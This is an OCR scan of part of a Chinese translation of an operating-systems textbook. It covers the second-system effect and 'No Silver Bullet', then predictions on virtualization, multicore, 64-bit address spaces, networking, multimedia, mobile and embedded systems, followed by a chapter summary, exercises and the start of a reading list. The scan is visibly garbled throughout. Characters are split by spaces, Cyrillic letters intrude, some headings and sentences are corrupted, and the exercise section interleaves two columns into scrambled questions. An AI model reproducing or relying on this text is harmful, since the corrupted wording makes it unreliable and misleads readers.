学 习 过 程 在 软件 生命 周期 中 应 该 更 早 就 开始 。 


а) b) 


图 13-11 а) 传统 的 分 阶段 软件 设计 过 程 ，b) 另 一 种 设计 在 第 一 天 开始 就 产生 一 个 (什么 都 不 做 的 ) 工作 系统 

缺乏 知识 是 一 件 危险 的 事情 。Brooks 注 意 到 被 他 称 为 第 二 系统 效应 (second system effect) 的 现象 。 
-个 设计 团队 生产 的 第 一 件 产品 经 常 是 最 小 化 的 ， 因 为 设计 人 员 担 心 它 可 能 根本 就 不 能 工作 。 结 果 ， 他 
们 在 加 入 许多 功能 特性 方面 是 迟疑 的 。 如 果 项 目 取得 成 功 ， 他 们 会 构建 后 续 的 系统 。 由 于 被 他 们 自己 的 
成 功 所 感动 ， 设 计 人 员 在 第 二 次 会 包含 所 有 华而不实 的 东西 ， 而 这 些 是 他 们 在 第 一 次 有 意 省 去 的 。 结 果 ， 
第 二 个 系统 频 肿 不 堪 并 且 性 能 低劣 。 第 二 个 系统 的 失败 使 他 们 在 第 三 次 冷静 下 来 并 且 再 次 小 心 谨慎 。 

就 这 一 点 而 言 ，CTSS 和 MULTICS 这 一 对 系统 是 一 个 明显 的 例子 。CTSS 是 第 一 个 通用 分 时 系统 并 
且 取 得 了 巨大 的 成 功 ， 尽 管 它 只 有 最 小 化 的 功能 。 它 的 后 继 者 MULTICS 过 于 野心 勃勃 并 因此 而 吃 尽 了 
苦头 。MULTICS 的 想法 是 很 好 的 ， 但 是 由 于 存在 太 多 新 的 东西 所 以 多 年 以 来 系统 的 性 能 十 分 低劣 并 且 
绝对 不 是 一 个 重大 的 商业 成 功 。 在 这 一 开发 路 线 中 的 第 三 个 系统 UNIX 则 更 加 小 心 谨慎 并 且 更 加 成 功 。 


13.5.4 没有 银 弹 

除了 《人 月 神话 》，Brooks 还 写 了 一 篇 有 影响 的 学 术 论文 ， 称 为 “No Silver Bullet”( 没 有 银 弹 ) 
(Brooks, 1987)。 在 这 篇 文章 中 ， 他 主张 在 十 年 之 内 由 各 色 人 等 守 售 的 灵丹妙药 中 ， 没 有 一 样 能 够 在 软 
件 生产 率 上 产生 数量 级 的 改进 。 经 验 表明 他 是 正确 的 。 

在 建议 的 银 弹 中 ， 包 括 更 好 的 高 级 语言 、 面 向 对 象 的 程序 设计 、 人 工 智能 、 专 家 系统 、 自 动 程序 设 
计 、 图 形 化 程序 设计 、 程 序 验 证 以 及 程序 设计 环境 。 或 许 在 下 一 个 十 年 将 会 看 到 一 颗 银 弹 ， 或 许 我 们 将 
只 好 满足 于 逐步 的 、 渐 进 的 改进 。 


13.6 操作 系统 设计 的 趋势 

做 预测 总 是 困难 的 一 一 特别 是 关于 未 来 。 例 如 ，1899 年 美国 专利 局 局 长 Charles Н. Duell 请 求 当时 的 
总 统 McKinley ( 麦 金 利 ) 取消 专利 局 (以 及 他 的 工作 ! ) ， 因 为 他 声称 “每 件 能 发 明 的 事物 都 已 经 发 明 
了 ”(Cerf апа Navasky, 1984) 。 然 而 ，Thomas Edison (托马斯 ， 爱 迪生) 在 几 年 之 内 就 发 明 了 几 件 新 
的 物品 ， 包 括 电灯 、 留 声 机 和 电影 放映 机 。 让 我 们 将 新 电池 装 入 我 们 的 水 晶 球 中 ， 并 且 冒 险 猜 测 一 下 在 
最 近 的 未 来 操作 系统 将 走向 何方 。 
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13.6.1 虚拟 化 
虚拟 化 重 回 时 代 。 它 第 一 次 出 现在 1967 年 的 IBM CP/CMS 系 统 中 ， 现 在 它 重 回 奔腾 平台 。 最 近 许多 


计算 机 在 裸 机 上 运行 管理 程序 ， 如 图 13-12 所 示 。 管 理 
程序 会 创建 多 个 虚拟 机 ， 每 个 虚拟 机 有 单独 的 操作 系统 。 虚拟 机 windows] ил | иш | Оте 
有 些 计算 机 利用 一 个 虚拟 机 为 遗产 应 用 创建 Windows 系 95 
统 ， 利 用 儿 个 虚拟 机 为 当前 应 用 运行 Linux 系 统 ， 或 许 (ТТ 

也 会 在 其 他 虚拟 机 上 运行 若干 实验 性 操作 系统 。 这 种 现 [| 
象 在 第 8 章 已 经 讨论 ， 并 且 是 未 来 的 发 展 趋 势 。 

1362 多 核 芯片 图 13-12 运行 4 个 虚拟 机 的 管理 程序 


多 核 芯 片 已 经 出 现 ， 但 即使 是 双核 ， 针对 它们 的 操作 系统 还 没有 很 好 地 利用 其 能 力 , 更 不 用 提 64 核 。 
这 些 核 会 做 什么 事情 ?它们 需要 哪些 软件 ?这些 目 前 都 是 未 知 的 。 起初 人 们 试图 通过 对 当前 操作 系统 
打 补丁 的 方法 来 支持 多 核 ， 但 锁 表 问题 和 其 他 软件 资源 的 问题 使 得 这 种 方法 不 太 可 能 成 功 ， 因此 需要 全 
新 的 思路 来 解决 这 些 问题 。 

虚拟 化 和 多 核 芯片 的 结合 创造 了 一 个 全 新 的 环境 ， 这 里 CPU 的 数目 是 可 编程 的 。 对 于 8 核 芯片 ， 软 
件 可 以 在 下 列 情况 做 同样 的 事情 : 只 利用 1 个 CPU 而 忽略 其 他 7 个 ， 使 用 全 部 8 个 CPU， 利 用 双 道 虚拟 化 
获得 16 个 虚拟 CPU， 利 用 四 道 虚拟 化 获得 32 个 虚拟 CPU， 或 更 多 其 他 组 合 。 程 序 可 以 在 启动 时 指定 所 需 
CPU 数目 ， 由 操作 系统 来 保证 程序 需求 的 满足 。 


13.6.3 大 型 地 址 空间 操作 系统 

随 着 计算 机 从 32 位 地 址 空间 转向 64 位 地 址 空间 ， 操作 系统 设计 中 的 重大 转变 成 为 可 能 。32 位 地 址 空 
间 并 不 大 。 如 果 你 通过 给 地 球 上 的 每 个 人 提供 他 或 她 自己 的 字 节 来 试图 分 割 22 个 字 节 ， 那么 将 没有 足够 
的 字 节 可 以 提供 。 相 反 ，2% 大 约 是 2 x 10, 现在 每 个 人 可 以 得 到 他 或 她 个 人 的 3GB 大 的 一 块 。 

对 于 2 x 10" 宇 节 的 地 址 空间 我 们 能 做 什么 呢 ? 首先 ， 可 以 淘汰 文件 系统 概念 。 作 为 替代 ， 所 有 文 
件 在 概念 上 可 以 始终 保存 在 (虚拟 ) 内 存 中 。 毕 竞 在 那里 存在 足够 的 空间 ， 可 以 放下 超过 10 亿 部 爹 长 的 
电影 ， 每 一 部 压缩 到 4GB。 

另 一 个 可 能 的 用 途 是 永久 对 象 存储 。 对 象 可 以 在 地 址 空间 中 创建 ， 并 且 保存 在 那里 直到 所 有 对 它们 
的 引用 消失 ， 在 此 时 它们 可 以 自动 被 删除 。 这 样 的 对 象 在 地 址 空间 中 是 永久 的 ， 其 至 是 在 关机 和 重新 启 
动 计算 机 的 时 候 。 有 了 64 位 的 地 址 空间 ， 在 用 光 地 址 空间 之 前 ， 可 以 用 每 秒 100MB 的 速率 创建 对 象 长 达 
5000 年 。 当 然 ， 为 了 实际 存储 这 么 大 量 的 数据 ， 需要 许多 磁盘 存储 器 用 于 分 页 交换 ， 但 是 在 历史 上 这 是 
第 一 次 限 是 磁盘 ， 而 不 是 地 址 空间 。 

由 于 大 量 数目 的 对 象 在 地 址 空间 中 ， 允许 多 个 进程 同时 在 相同 的 地 址 空间 中 运行 ， 以 便 以 一 般 的 方 
式 共享 对 象 就 变 得 十 分 有 趣 了 。 这 样 的 设计 显然 会 通 向 与 我 们 现在 所 使 用 的 操作 系统 完全 不 同 的 操作 系 

。 有 关 这 一 概念 的 某 些 思想 包含 在 参考 文献 (Chase 等 人 ，1994) 中 。 

就 64 位 地 址 而 言 ， 另 一 个 必须 重新 思考 的 操作 系统 问题 是 虚拟 内 存 。 对 于 2“ 字 节 的 虚拟 地 址 空间 
和 8KB 的 页 面 , 我 们 有 2 个 页 面 。 常规 的 页 表 不 能 很 好 地 按 比例 变换 到 这 样 的 大 小 ， 所 以 需要 别 的 东西 。 
反 转 的 页 表 是 可 行 的 ， 但 是 也 有 人 提出 了 其 他 的 想法 (Talluri A, 1995) 。 无 论 如 何 ，64 位 操作 系统 
为 新 的 研究 提供 了 大 量 的 余地 。 


13.6.4 联网 

当前 的 操作 系统 是 为 独立 的 计算 机 而 设计 的 。 联 网 是 事后 添加 的 ， 并 且 一 般 通过 特殊 的 程序 访问 ， 
例如 Web 浏 览 器 、FTP 或 telnet。 在 将 来 ， 联网 或 许 将 会 是 所 有 操作 系统 的 基础 。 不 具备 网 络 连接 的 独立 
的 计算 机 就 像 是 没有 连接 到 电话 网 的 电话 机 一 样 罕见 。 并 且 很 可 能 几 Gbps 的 连接 是 标准 的 速率 。 

操作 系统 将 不 得 不 改变 以 适应 这 一 范 型 的 转变 。 本 地 数据 与 远程 数据 的 区 别 可 能 会 模糊 到 这 样 的 程 
Ж: 实际 上 没有 人 知道 或 者 关心 数据 存放 在 什么 地 方 。 任何 地 方 的 计算 机 能 够 像 本 地 数据 一 样 处 理 任何 
地 方 的 数据 。 在 一 个 有 限 的 范围 内 ， 对 于 NFS 而 言 这 已 经 成 为 现实 ， 但 是 它 很 可 能 变 得 更 加 普遍 并 且 更 
好 地 集成 。 
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对 于 Web 的 访问 现在 需要 特殊 的 程序 (浏览 器 ) ЖЖ АГЕ ПД ESEN R EE ЖЗ НЕ Ж 
统 中 。 存 储 信息 的 标准 方式 可 能 会 变 为 Web 页 面 ， 并 且 这 些 页 面 可 能 包含 各 种 各 样 的 非 文本 项 目 ， 包 括 
音频 、 视 频 、 程 序 以 及 其 他 ， 它 们 全 部 作为 操作 系统 的 基本 数据 而 管理 。 


13.6.5 并 行 系统 与 分 布 式 系统 

另 一 个 活跃 的 领域 是 并 行 系统 与 分 布 式 系统 。 当 前 的 多 处 理 器 操作 系统 和 多 计算 机 操作 系统 只 是 标 
准 的 单 处 理 器 操作 系统 对 调度 器 进行 了 轻微 的 调整 ， 以 便 对 并 行 性 处 理 得 好 一 点 。 在 将 来 ， 我 们 可 能 会 
看 到 这 样 的 操作 系统 ， 其 中 并 行 性 比 现在 更 加 处 于 中 心地 位 。 如 果 在 多 处 理 器 配置 下 台式 计算 机 很 快 拥 
有 2 个 、4 个 或 更 多 的 CPU， 这 一 效应 将 会 大 大 地 激发 。 这 就 可 能 导致 许多 应 用 程序 为 多 处 理 器 而 设计 
并 且 就 要 求 操作 系统 对 并 发 性 要 求 提供 更 好 的 支持 。 

在 未 来 几 年 ， 多 计算 机 很 可 能 在 大 规模 科学 与 工程 超级 计算 机 中 占据 支配 地 位 ， 但 是 它们 的 操作 系 
统 还 相当 原始 。 进 程 安置 、 负 载 平衡 以 及 通信 都 需要 做 大 量 的 工作 。 

目前 分 布 式 系统 经 常 作为 中 间 件 来 构建 ， 因 为 现 有 的 操作 系统 没有 为 分 布 式 应 用 程序 提供 正确 的 设 
施 。 今 后 ， 操 作 系统 的 设计 将 会 考虑 到 分 布 式 系统 ， 所 以 从 一 开始 所 有 必要 的 功能 特性 在 操作 系统 中 就 
已 经 存在 了 。 
13.6.6 多 媒体 

多 媒体 系统 在 计算 机 世界 里 显然 是 一 颗 正在 升 起 的 明星 。 如 果 计算 机 、 立 体 声音 响 、 电 视 机 和 电话 
机 全 部 合并 在 一 起 成 为 一 个 单一 的 设备 ， 能 够 支持 高 质量 的 静止 图 像 、 音 频 和 视频 ， 并 且 连 接 到 高 速 网 络 
中 ， 从 而 能 够 轻松 地 下 载 、 交 换 和 远程 访问 这 些 文件 ， 可 能 不 会 有 人 感到 吃惊 。 这 些 设备 的 操作 系统 ， 其 
至 是 独立 的 音频 和 视频 设备 的 操作 系统 ， 与 现在 的 操作 系统 在 本 质 上 是 不 同 的 。 特 别 地 ， 实 时 保证 是 必须 
的 ， 这 将 推动 系统 设计 。 此 外 ， 消 费 者 完全 不 能 容忍 他 们 的 数字 电视 时 不 时 地 崩溃 ， 所 以 要 求 更 好 的 软件 
质量 和 容错 性 。 还 有 ， 多 媒体 文件 倾向 于 非常 长 ， 所 以 必须 改造 文件 系统 以 便 能 够 有 效 地 处 理 它们 
13.6.7 电池 供电 的 计算 机 

功能 强大 的 台式 计算 机 (可 能 拥有 64 位 地 址 空间 、 高 带宽 网 络 、 多 处 理 器 以 及 高 品质 的 音频 和 视频 ) 
无 疑 很 快 就 会 普及 。 它 们 的 操作 系统 4 前 的 操作 系统 有 重大 的 区 别 ， 以 便 处 理 所 有 这 些 需 求 。 然 
而 ， 市 场 上 增长 其 至 更 快 的 部 分 是 电池 供电 的 计算 机 ， 包 括 笔记 本 、 掌 上 机 、Webpad、100 美 元 的 膝 上 
机 以 及 智能 手机 。 它 们 中 的 某 些 机 种 拥有 与 外 部 世界 的 无 线 连接 ， 其 他 的 机 种 当 它 们 不 在 家 中 与 坞 站 对 
接 时 将 运行 在 非 连接 的 模式 下。 这 就 需要 不 同 的 操作 系统 ， 它 们 比 当前 的 操作 系统 更 加 小 巧 、 快 速 、 灵 
话 和 可 靠 。 在 这 里 ， 各 种 各 样 的 微 内 核 与 可 扩展 的 系统 可 能 形成 这 类 操作 系统 的 基础 。 

这 些 操作 系统 必须 处 理 完全 连接 (也 就 是 有 线 连接 )、 弱 连接 (也 就 是 无 线 连接 ) 和 非 连 接 操作 
包括 离线 前 的 数据 储 蕊 和 返回 在 线 时 的 一 致 性 分 析 ， 这 些 都 要 比 当前 的 系统 更 好 。 它们 还 必须 能 比 当前 


的 系统 更 好 地 处 理 移动 (例如 找到 一 个 激光 打印 机 ， 登 录 到 其 上 ， 并 且 通过 无 线 电波 把 文件 发 送 给 
它 )。 电 源 管理 是 必需 的 ， 这 包括 在 操作 系统 与 应 用 程序 之 间 关 于 剩余 多 少 电池 电量 以 及 电池 如 何 最 好 
利用 的 大 量 对 话 框 。 动 态 地 改装 应 用 程序 以 处 理 微小 屏幕 的 局 限 可 能 变 得 十 分 重要 。 最 后 ， 新 的 输入 和 


输出 模式 (包括 手写 和 语音 ) 可 能 需要 操作 系统 的 新 技术 以 改善 品质 。 电 字 供 电 、 掌 上 无 线 、 语 音 操 作 
的 计算 机 ， 与 具有 4 个 64 位 CPU 的 多 处 理 器 以 及 以 GB 为 单位 光纤 网 络 连接 的 台式 计算 机 ， 两 者 的 操作 系 
统 不 太 可 能 有 很 多 共同 之 处 。 当 然 ， 还 存在 无 数 的 混交 机 种 具有 它们 自己 的 需求 。 


13.6.8 ARRE 

新 型 操作 系统 将 高 速 增长 的 最 后 一 个 领域 是 嵌入 式 系统 。 处 于 洗衣 机 、 微 波 炉 、 玩 具 、 唱 体 管 收音 
机 、MP3 播 放 器 、 便 携 式 摄像 机 、 电 梯 以 及 心脏 起 搏 器 内 部 的 操作 系统 将 不 同 于 上 面 的 所 有 操作 系统 ， 
并 且 很 可 能 相互 之 间 也 不 相同 。 每 个 操作 系统 或 许 都 需要 仔细 地 剪裁 以 适应 其 特定 的 应 用 ， 因 为 任何 人 
都 不 大 可 能 将 一 块 PCI 卡 插入 心脏 起 捕 器 将 其 变 成 一 个 电梯 控制 器 。 由 于 所 有 的 做 入 式 系统 在 设计 时 就 
知道 它 只 运行 有 限 数目 的 程序 ， 所 以 对 其 进行 优化 是 可 能 的 ， 而 这 样 的 优化 在 通用 系统 中 是 做 不 到 的 。 

对 于 做 入 式 系 统 而 言 ， 一 种 有 希望 的 思路 是 可 扩展 的 操作 系统 (例如 Paramecium 和 Exokernel)。 这 
些 操作 系统 可 以 随 着 应 用 程序 的 需要 而 被 构建 成 轻 量 级 的 或 重量 级 的 ， 但 是 以 一 种 应 用 程序 间 一 致 的 方 
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式 。 因 为 嵌入 式 系统 将 以 上 亿 的 量 级 生产 ， 所 以 对 于 新 型 操作 系统 而 言 这 是 一 个 主要 的 市 场 。 


1369 传 感 节点 

虽然 传 感 网 络 的 市 场 并 不 大 ， 但 它们 正 被 部 署 在 很 多 环境 中 ， 从 楼 字 / 边 境 监控 到 森林 火险 监测 等 。 
传感器 是 低 成 本 、 低 功 耗 的 ， 需 要 特别 精简 的 操作 系统 ， 仅 比 运行 时 函数 库 复杂 一 些 。 随 着 功能 强大 的 
传 感 节点 越 来 越 便宜 ， 我 们 会 看 到 实际 的 操作 系统 运行 其 上 ， 并 尽 可 能 针对 其 任务 进行 优化 、 尽 可 能 节 
约 功 耗 。 一 般 来 说 ， 其 电池 寿命 以 月 衡量 ， 而 无 线 传输 是 主要 的 电源 消耗 者 ， 因 此 这 些 系统 应 该 以 节能 
为 首要 目标 。 
13.7 小 结 

操作 系统 的 设计 开始 于 确定 它 应 该 做 什么 。 接 口 应 该 是 简单 的 、 完 备 的 和 高 效 的 。 应 该 拥有 一 个 清 
晰 的 用 户 界 面 范 型 、 执 行 范 型 和 数据 范 型 。 

系统 应 该 具有 良好 的 结构 ， 使 用 若干 种 已 知 技术 中 的 一 种 ， 例如 分 层 结 构 或 客户 ~ 服务 器 结构 。 内 
部 组 件 应 该 是 相互 正 交 的 ， 并 且 要 清楚 地 分 离 策略 与 机 制 。 大 量 的 精力 应 该 投入 到 诸如 静态 与 动态 数据 
结构 、 命 名 、 绑 定时 机 以 及 模块 实现 次 序 这 样 的 一 些 问题 上 。 

性 能 是 重要 的 ， 但 是 优化 应 该 仔细 地 选择 ， 从 而 使 优化 不 致 于 破坏 系统 的 结构 。 空间 -时 间 权衡 、 
高 速 缓存 、 线 索 、 利 用 局 部 性 以 及 优化 常见 的 情况 等 技术 通常 都 值得 尝试 。 

两 三 个 人 编写 一 个 系统 与 300 个 人 生产 一 个 大 型 系统 是 不 同 的 。 在 后 一 种 情况 下 ， 团队 结构 和 项 目 
管理 对 于 项 目的 成 败 起 着 至 关 重 要 的 作用 。 

最 后 ， 操 作 系统 在 未 来 几 年 必须 进行 变革 以 跟 上 新 的 趋势 和 迎接 新 的 挑战 。 这 些 趋势 和 挑战 包括 基 
于 管理 程序 的 系统 、 多 核 系统 、64 位 地 址 空间 、 大 规模 的 网 络 连接 、 大 规模 多 处 理 器 、 多 媒体 、 掌 上 无 
线 计算 机 、 供 入 式 系统 及 其 传 感 节点 。 对 于 操作 系统 设计 人 员 来 说 今后 几 年 将 十 分 令 人 激动 。 


习题 


1. 摩尔 定律 (Moore's law) 描述 了 一 种 指数 增长 lseek、mkdir、mknod、open、pause、 pipe、 
现象 ， 类 似 于 将 一 个 动物 物种 引入 到 具有 充足 read, stat, time, times, umask, unlink, 
食物 并 且 没 有 天 敌 的 新 环境 中 生长 。 本 质 上 ， utime、wait 和 write 。 

随 着 食物 供应 变 得 有 限 或 者 食肉 动物 学 会 了 捕 在 一 个 基于 微 内 核 的 客户 一 服务 器 系统 中 ， 微 
食 新 的 被 捕食 者 ， 一 条 指数 增长 曲线 可 能 最 终 内 核 只 做 消息 传递 而 不 做 其 他 任何 事情 。 用 户 
成 为 一 条 有 具有 一 个 渐进 极限 的 S 形 曲线 。 讨 论 可 进程 仍然 可 以 创建 和 使 用 信号 量 吗 ? 如 果 是 ， 
能 最 终 限制 计算 机 硬件 改进 速率 的 因素 。 怎样 做 ? 如 果 不 是 ， 为 什么 不 能 ? 

:图 13-1 显 示 了 两 种 范 型 : 算法 范 型 和 事件 驱动 6. 细致 的 优化 可 以 改进 系统 调用 的 性 能 。 考 虑 这 
范 型 。 对 于 下 述 每 一 种 程序 ， 哪 一 范 型 可 能 更 样 一 种 情况 ， 一 个 系统 调用 每 10ms 调 用 一 次 ， 


^ 


ю 


容易 使 用 : 一 次 调用 花费 的 平均 时 间 是 2ms。 如 果 系 统 调 
а) 编译 器 用 能 够 加 速 两 倍 ， 花 费 10s 的 一 个 进程 现在 要 花 
b) 照片 编辑 程序 费 多 少时 间 运行 ? 

9) 工资 单程 序 7. 请 在 零售 商店 的 上 下 文中 简要 讨论 一 下 机 制 与 
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:在 某 些 早期 的 苹果 Macintosh 计 算 机 上 ，GUI 代 策略 。 

码 是 在 ROM 中 的 。 为 什么 ? - 操作 系统 经 常 在 外 部 和 内 部 这 两 个 不 同 的 层次 上 
“Corbat6 的 格言 是 系统 应 该 提供 最 小 机 制 。 这 里 实现 命名 。 这 些 名 字 就 如 下 性 质 有 什么 区 别 ? 

是 一 份 POSIX 调 用 的 列表 ， 这 些 调用 也 存在 于 a) KE 

UNIX 版 本 7 中 。 哪 些 是 元 余 的 ? 换 句 话说 ， 哪 b) 惟一 性 

些 可 以 被 删除 而 不 损失 功能 性 ， 因 为 其 他 调用 с) 层次 结构 

的 简单 组 合 可 以 做 同样 的 工作 并 具有 大 体 相同 处 理 大 小 事先 未 知 的 表格 的 一 种 方法 是 将 其 大 
HERE. access, alarm, chdir, chmod, 小 固定 ， 但 是 当 表 格 填 满 时 ， 用 一 个 更 大 的 表 
chown、chroot、close、creat、dup、exec、 格 取代 它 ， 并 且 将 旧 的 表 项 复制 到 新 表 中 ， 然 
exit, fenti, fork, fstat, ioctl, kill, link, 后 释放 旧 的 表格 。 使 新 表 的 大 小 是 原始 表格 大 
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小 的 2 倍 ， 与 新 表 的 大 小 只 是 原始 表格 大 小 的 
1.5 倍 相 比 ， 有 什么 优点 和 缺点 ? 

10. 在 图 13-5 中 ， 标 志 found 用 于 表明 是 否 找到 一 

个 PID。 忽 略 found 而 只 是 在 循环 的 结尾 处 测试 

P 以 了 解 是 否 到 达 结 尾 ， 这 样 做 可 行 码 ? 

.在 图 13-6 中 ， 条 件 编译 隐藏 了 Pentium 与 Ultra 

SPARC 的 区 别 。 相 同 的 方法 可 以 用 于 隐藏 拥有 

一 块 IDE 磁 盘 作 为 惟一 磁盘 的 Pentium 与 拥有 一 

块 SCSI 磁 盘 作为 惟一 磁盘 的 Pentium 之 间 的 区 

别 吗 ? 这 是 一 个 好 的 思路 吗 ? 

,间接 是 使 一 个 算法 更 加 灵活 的 一 种 方法 。 它 有 

缺点 吗 ? 如 果 有 的 话 ， 有 哪些 缺点 ? 

可 重 人 的 过 程 能 够 拥有 私有 静态 全 局 变量 吗 ? 

讨论 你 的 答案 。 

14. 图 13-7b 中 的 宏 显 然 比 图 13-7a 中 的 过 程 效率 更 

高 。 然 而 ， 它 的 一 个 缺点 是 难于 阅读 。 它 还 存 

在 其 他 缺点 吗 ? 如果 有 的 话 ， 还 有 哪些 缺点 ? 

假设 我 们 需要 一 种 方法 来 计算 一 个 32 位 字 中 1 

的 个 数 是 奇数 还 是 偶数 。 请 设计 一 种 算法 尽 可 

能 快 地 执行 这 一 计算 。 如 果 必 要 ， 你 可 以 使 用 

最 大 256KB 的 RAM 来 存放 各 种 表 。 编 写 一 个 

宏 实 现 你 的 算法 。 附 加 分 : 编写 一 个 过 程 通过 

在 32 个 位 上 进行 循环 来 做 计算 。 测 量 一 下 你 的 

宏 比 过 程 快 多 少 倍 。 

16. 在 图 13-8 中 ， 我 们 看 到 GIF 文件 如 何 使 用 8 位 的 
值 作 为 索引 检索 一 个 调 色 板 。 相 同 的 思路 可 以 
用 于 16 位 宽 的 调 色 板 。 在 什么 情况 下 (如果 有 
的 话 )，24 位 的 调 色 板 是 一 个 好 的 思路 ? 

17. GIF 的 一 个 缺点 是 图 像 必 须 包含 调 色 板 ， 这 会 
增加 文件 的 大 小 。 对 于 一 个 8 位 宽 的 调 色 板 而 
言 ， 达 到 收 支 平衡 的 最 小 图 像 大 小 是 多 少 ? 对 
于 16 位 宽 的 调 色 板 重 复 这 一 问题 。 

18. 在 正文 中 ,我们 展示 了 对 路 径 名 进行 高 速 缓存 
使 得 当 查找 路 径 名 时 可 以 显著 地 加 速 。 有 时 使 
用 的 另 一 种 技术 是 让 一 个 守护 程序 打开 根 目录 
中 的 所 有 文件 ， 并 且 保 持 它们 永久 地 打开 ， 为 
的 是 迫使 它们 的 i 节点 始终 处 于 内 存 中 。 像 这 
样 钉 住 i 节 点 可 以 进一步 改进 路 径 查找 吗 ? 

19. 即使 一 个 远程 文件 自从 记录 了 一 个 线索 以 来 没有 
被 删除 ， 它 也 可 能 自从 最 后 一 次 引用 以 来 发 生 了 
改变 。 有 哪些 可 能 有 用 的 其 他 信息 要 记录 ? 
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20. 考虑 一 个 系统 ， 它 将 对 远程 文件 的 引用 作为 线 
索 而 储藏 ， 例 如 形 如 (名字 ， 远 程 主机 ， 远 程 
名 字 )。 一 个 远程 文件 悄悄 地 被 删除 然后 被 取 
代 是 可 能 的 。 那 么 线索 将 取 回 错误 的 文件 。 怎 
样 才能 使 这 一 问题 尽 可 能 少 地 发 生 ? 

.我 们 在 正文 中 盖 述 了 局 部 性 经 常 可 以 被 用 来 改 

进 性 能 。 但 是 ， 考 虑 一 种 情况 ， 其 中 一 个 程序 

从 一 个 数据 源 读 取 输 入 并 且 连 续 地 输出 到 两 个 

或 多 个 文件 中 。 试 图 利用 文件 系统 中 的 局 部 性 

在 这 里 可 能 会 导致 效率 的 降低 吗 ? 存在 解决 这 

一 问题 的 方法 吗 ? 

22. Fred Brooks 声 称 一 名 程序 员 每 年 只 能 编写 1000 
行 调试 好 的 代码 ， 然 而 MINIX 的 第 一 版 
(13 000 行 代码 ) 是 一 个 人 在 3 年 之 内 创作 的 。 
怎样 解释 这 一 矛盾 ? 

23. 使 用 Brooks 每 名 程序 员 每 年 1000 行 的 数字 ， 估 

计生 产 Windows Vista 花 费 的 资金 数量 。 假 设 

一 名 程序 员 每 年 的 成 本 是 100 000 美 元 (包括 

日 常 开销 ， 例 如 计算 机 、 办 公 空 间 、 秘 书 支持 

以 及 管理 开销 ) 。 你 相信 这 一 答案 吗 ? 如 果 不 

相信 ， 什 么 地 方 有 错误 ? 

“ 随 着 内 存 越 来 越 便宜 ， 可 以 设想 一 台 计算 机 拥 

有 巨大 容量 的 电池 供电 的 RAM 来 取代 硬盘 。 

以 当前 的 价格 ， 仅 有 RAM 的 低 端 PC 成 本 是 多 

D? 假设 1GB 的 RAM 盘 对 于 低 端 机 器 是 足够 

的 。 这 样 的 机 器 有 竞争 力 吗 ? 

25. 列举 某 个 装置 内 部 的 做 入 式 系统 中 不 需要 用 到 
的 常规 操作 系统 的 某 些 功能 特性 。 

26. 使 用 C 编 写 一 个 过 程 ， 在 两 个 给 定 的 参数 上 做 
双 精度 加 法 。 使 用 条 件 编译 编写 该 过 程 ， 使 它 
既 可 以 在 16 位 机 器 上 工作 ， 也 可 以 在 32 位 机 器 
„Бї; 

27. 编写 程序 ， 将 随机 生成 的 短 字 符 串 输入 到 一 个 
数组 中 ， 然 后 使 用 下 述 方法 在 数组 中 搜索 给 定 
HFFR: a) 简单 的 线性 搜索 (EHE), b) 
自选 的 更 加 复杂 的 方法 。 对 于 从 小 型 数组 到 你 
的 系统 所 能 处 理 的 最 大 数组 这 样 的 数组 大 小 范 
围 重新 编译 你 的 程序 。 评 估 两 种 方法 的 性 能 。 
收 支 平衡 点 在 哪里 ? 

28. 编写 一 个 程序 模拟 在 内 存 中 的 文件 系统 。 
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第 14 章 ”阅读 材料 及 参考 文献 


在 前 13 章 中 我 们 已 经 介绍 了 操作 系统 的 许多 内 容 。 本 章 的 目的 在 于 向 那些 希望 对 操作 系统 进行 进 一 
步 研究 的 读者 提供 一 些 帮助 。14.1 节 列 出 了 向 读者 推荐 的 阅读 材料 ， 14.2 节 按照 字母 顺序 列 出 了 本 书 中 
所 引用 的 所 有 书籍 和 文章 。 

除了 下 面 给 出 的 参考 书目 以 外 ， 奇 数 年 份 举行 的 ACM 操 作 系统 原 理学 术 会 议 (Symposium on 
Operating Systems Principles, SOSP) 和 偶数 年 份 举行 的 USENIX 操 作 系 统 设计 与 实现 学 术 会 议 
(Symposium on Operating Systems Design and Implementation, OSDI) 也 是 了 解 目 前 操作 系统 领域 研究 
工作 的 很 好 渠道 。 一 年 一 度 的 Eurosys 200x 会 议 也 有 一 流 的 文章 。 还 可 以 在 《ACM Transactions on 
Computer Systems》 和 《ACM SIGOPS Operating Systems Review》 两 份 杂志 中 找到 -一些 相 关 的 文章 。 
另外 ACM、IEEE 和 USENIX 的 许多 会 议 也 涉及 到 有 关 的 内 容 。 


14.1 进行 深入 阅读 的 建议 

在 以 下 各 小 节 中 ， 我 们 给 出 一 些 深入 阅读 的 建议 。 与 本 书 中 标题 为 “与 .….. 有 关 的 研究 工作 ” 小 节 
中 引用 的 那些 有 关 当 前 研究 工作 的 文章 不 同 ， 这 些 参考 资料 实际 上 多 数 属于 入 门 和 培训 -类 的 。 不 过 ， 
可 以 把 它们 看 作 本 书 中 所 介绍 内 容 的 不 同 视角 和 不 同 的 着 重点 。 


14.1.1 简介 及 概要 

Silberschatz et al., Operating System Concepts with Java, 7th ed. 

关于 操作 系统 的 一 本 通用 教材 。 它 涵盖 了 进程 、 内 存 管理 、 存 储 管理 、 保 护 和 安全 、 分 布 式 系统 和 
一 些 专用 系统 等 方面 的 内 容 。 书 中 给 出 了 两 个 实例 :Linux 和 Windows XP, 书 的 封面 全 是 恐龙 ， 这 与 公 
元 2000 年 的 操作 系统 有 什么 关系 不 十 分 清楚 。 

Stallings, Operating Systems, Sth ed. 

这 是 有 关 操 作 系 统 的 另 一 本 教科 书 。 它 涵盖 了 所 有 传统 的 内 容 还 包括 少量 分 布 式 系统 的 内 容 。 

Stevens and Rago, Advanced Programming in the UNIX Environment 

该 书 叙述 如 何 使 用 UNIX 系 统 调用 接口 以 及 标准 C 库 编写 C 程 序 。 有 基于 System V 第 4 版 以 及 UNIX 
4.4BSD 版 的 例子 。 有 关 这 些 实现 与 POSIX 的 关系 在 书 中 有 具体 叙述 。 

Tanenbaum and Woodhull, “Operating Systems Design and Implementation” 

一 个 通过 动手 实践 来 学 习 操作 系统 的 方法 。 这 本 书 主要 介绍 了 -一些 常 见 的 原理 ， 另外 详细 介绍 了 一 
个 真实 的 操作 系统 一 MINIX3。 并 且 附带 了 这 个 操作 系统 的 清单 。 


14.1.2 进程 和 线程 

Andrews and Schneider, “Concepts and Notations for Concurrent Programming” 

这 是 一 本 关于 进程 和 进程 间 道 信 的 教程 ， 包 括 忙 等 待 、 信 号 量 、 管 程 、 消息 传递 以 及 其 他 技术 。 文 
